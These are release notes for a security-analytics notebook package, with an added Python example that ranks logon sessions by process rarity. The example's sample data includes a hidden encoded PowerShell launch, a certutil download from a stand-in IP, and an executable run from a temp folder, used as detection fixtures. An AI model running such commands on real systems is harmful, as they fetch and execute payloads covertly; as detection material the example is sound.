
Account Summary, IP Summary, Logon Session rarity notebooklets

ianhelle released this 13 May 18:43 (bf2a975)

The second release of Notebooklets has been a long time coming, but it is finally here.
It includes three new notebooklets:

  • Account Summary - explore an account (Azure/Office, Windows or Linux):
    logon activity, Azure and Office activity, alerts, etc.
  • IP Address Summary - explore an IP address:
    threat intel, geolocation and whois, plus checks for the presence of the IP in multiple Azure Sentinel logs.
  • Logon Session Rarity - uses clustering of processes to estimate the relative unusualness of individual logon sessions.
    Browse the sessions with unusual activity using event timelines or process trees.
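The session-rarity idea in the last bullet, as an added illustration that is not msticnb's own code: process-creation events are grouped into coarse clusters by a feature key (executable name, capped argument count, whether the image ran from a trusted directory), the size of a cluster across all sessions is taken as a measure of how common that kind of process is, and each session is scored by the mean rarity of its processes. The events, session IDs, account names, the TRUSTED_DIRS list and the feature key are all constructed for this example; the notebooklet's own clustering features and scoring are not reproduced here.

```python
"""Illustrative logon-session rarity scoring (added example, not msticnb's code).

Process-creation events are grouped into coarse "clusters" by a feature key
(executable name, capped argument count, whether it ran from a trusted
directory).  The size of a cluster across all sessions measures how common
that kind of process is; a session's rarity is the mean rarity of its
processes, and singleton clusters are counted as "rare processes".
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
import math

# Directories treated as "trusted" for the feature key (assumption for the example).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass(frozen=True)
class ProcessEvent:
    session_id: str
    account: str
    image: str          # full path of the executable
    command_line: str


@dataclass(frozen=True)
class SessionScore:
    session_id: str
    account: str
    process_count: int
    rare_process_count: int   # processes whose cluster contains only this event
    rarity: float             # mean per-process rarity; higher = more unusual


# Constructed sample data: three routine interactive sessions plus one session
# (s4) that runs encoded PowerShell, a certutil download and a binary from %TEMP%.
_OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
_CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
_EXPLORER = r"C:\Windows\explorer.exe"
EVENTS = [
    ProcessEvent("s1", "alice", _EXPLORER, "explorer.exe"),
    ProcessEvent("s1", "alice", _OFFICE, "OUTLOOK.EXE"),
    ProcessEvent("s1", "alice", _CHROME, "chrome.exe --profile-directory=Default"),
    ProcessEvent("s2", "bob", _EXPLORER, "explorer.exe"),
    ProcessEvent("s2", "bob", _OFFICE, "OUTLOOK.EXE"),
    ProcessEvent("s2", "bob", _CHROME, "chrome.exe --profile-directory=Default"),
    ProcessEvent("s3", "alice", _EXPLORER, "explorer.exe"),
    ProcessEvent("s3", "alice", _OFFICE, "OUTLOOK.EXE"),
    ProcessEvent("s3", "alice", _CHROME, "chrome.exe --profile-directory=Default"),
    ProcessEvent("s4", "svc-backup", _EXPLORER, "explorer.exe"),
    ProcessEvent("s4", "svc-backup",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ProcessEvent("s4", "svc-backup", r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"),
    ProcessEvent("s4", "svc-backup", r"C:\Users\svc-backup\AppData\Local\Temp\a.exe", "a.exe"),
]


def feature_key(ev: ProcessEvent) -> tuple:
    """Coarse feature used to cluster processes: exe name, capped arg count, trusted dir."""
    exe = ev.image.rsplit("\\", 1)[-1].lower()
    arg_count = min(len(ev.command_line.split()) - 1, 4)  # cap so long command lines still cluster
    trusted = ev.image.lower().startswith(TRUSTED_DIRS)
    return (exe, arg_count, trusted)


def cluster_processes(events) -> Counter:
    """Cluster size for each feature key, counted across all sessions."""
    return Counter(feature_key(ev) for ev in events)


def score_sessions(events) -> dict:
    """Per-session rarity: mean of -log(cluster_size / total_events) over its processes."""
    clusters = cluster_processes(events)
    total = len(events)
    by_session = defaultdict(list)
    for ev in events:
        by_session[ev.session_id].append(ev)
    scores = {}
    for sid, evs in by_session.items():
        sizes = [clusters[feature_key(ev)] for ev in evs]
        # A cluster holding every event scores 0; a singleton scores log(total).
        rarities = [-math.log(size / total) for size in sizes]
        scores[sid] = SessionScore(
            session_id=sid,
            account=evs[0].account,
            process_count=len(evs),
            rare_process_count=sum(1 for size in sizes if size == 1),
            rarity=sum(rarities) / len(rarities),
        )
    return scores


def rank_sessions(events) -> list:
    """Sessions ordered from most to least unusual."""
    return sorted(score_sessions(events).values(), key=lambda s: s.rarity, reverse=True)


if __name__ == "__main__":
    for s in rank_sessions(EVENTS):
        print(f"{s.session_id} {s.account:<11} procs={s.process_count} "
              f"rare={s.rare_process_count} rarity={s.rarity:.2f}")
```

On the constructed data, s4 ranks first with three singleton-cluster processes while s1, s2 and s3 tie at a low score. Two caveats carry over to any rarity scoring of this kind: the feature key decides what counts as "the same" process (too fine and everything is a singleton, too coarse and an encoded PowerShell command clusters with routine admin scripts), and a session that only runs common-looking binaries scores low regardless of what it did, which is why the notebooklet pairs the score with the event timeline and process tree views mentioned above.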

This release also adds support for MSTICPy pivot functions: loading the Notebooklets package registers the
notebooklet run functions as pivots on the appropriate entity (e.g. Host, Account, IP).

Updates

86c0865 Automated ReadtheDocs documentation for notebooklets
e3bc125 Logon session rarity notebooklet.
58c8e60 Adding print_options function to notebooklet.py
49e05a6
  • Add data_viewers.py module for simple event browsing
  • Added Pivot initialization to the package init.py so that notebooklets are added as pivot functions
  • Created local version of convert_to_ip_entities that accepts geoip provider in args. This is used by ti_enrich, host.py, host_logons_summary.py and, indirectly, by ip_summary and network_flow_summary.
  • Added map_ips function to ip_tools - generic Folium map for list of IPs
  • Change notebooklet_result.py so that it only displays first 5 rows of DF and has explanatory text why not everything is showing.
3d619cb
  • Added some utility functions to common.py and notebooklet.py
    • check_valid_result_data
    • check_table_exists
    • get_methods/list_methods (lists only methods defined on subclasses, not Notebooklet class)
  • Split NotebookletResult into separate module notebooklet_result.py
  • Added ability to invoke notebooklet functions from results class
  • Added alert.py alert browser

Fixes

27db47e Changed requirements for msticpy to be >=1.0.0
631a57d Fixing docstring in ip_summary
d330b22
  • Better formatting of options in help: added options doc string to notebooklet init.
  • Refactored large init function in notebooklet
419cce1 Fixing tests that depend on GeoLiteLookup - replace with mock class. Temporary workaround for convert_to_ip_entities in host.py
1d2cf20 Update azure-pipelines.yml for Azure Pipelines. Add maxmind auth key
256f6ec Fixing setup.py to read from requirements.txt
e2e48e6 Update azure-pipelines.yml for Azure Pipelines. Add install of pytest-check
0a88c16 Some test and linter fixes
3d619cb
  • Fixes/regularization to host.host.py and iptools.py. Added VPS lookup
  • Added several test data sets such as azure_activity_df, az_net_df (interface), vmcomputer_df, host_hb_df
  • Added mock classes for TILookup and GeoIP for testing
  • Switched several test modules to native pytest format.
184a2af
  • Update to add extra method to notebooklet base class for wrapped run method
  • Some fixes due to pandas TZ-specific changes and some of the test data.
  • Removed TimeSpan from common.py - now imported from msticpy.
029753e Add pivot support for notebooklets run method.
ee1125e
  • Update to add extra method to notebooklet base class for wrapped run method
  • Some fixes due to pandas TZ-specific changes and some of the test data.
  • Removed TimeStamp from common.py - now imported from msticpy.
159d63f Create CONTRIBUTING.md
617ce20 Changing image sizes in readme. Spelling corrections
99a3441 Documentation addition and update to README.md
906da10 Update README.md. Added link to the notebook and introductory text.